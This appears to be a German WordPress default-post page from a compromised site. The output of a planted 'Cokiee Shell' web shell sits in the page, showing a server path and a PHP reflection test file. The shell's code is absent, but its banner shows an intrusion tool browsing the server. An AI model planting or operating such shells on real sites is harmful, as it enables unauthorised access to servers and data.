Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/reflection/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/reflection/tests/ReflectionObject_export_basic2.phpt |
--TEST-- ReflectionObject::export() : very basic test with dynamic properties --FILE-- <?php class Foo { public $bar = 1; } $f = new foo; $f->dynProp = 'hello'; $f->dynProp2 = 'hello again'; ReflectionObject::export($f); ?> --EXPECTF-- Object of class [ <user> class Foo ] { @@ %s 3-5 - Constants [0] { } - Static properties [0] { } - Static methods [0] { } - Properties [1] { Property [ <default> public $bar ] } - Dynamic properties [2] { Property [ <dynamic> public $dynProp ] Property [ <dynamic> public $dynProp2 ] } - Methods [0] { } }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare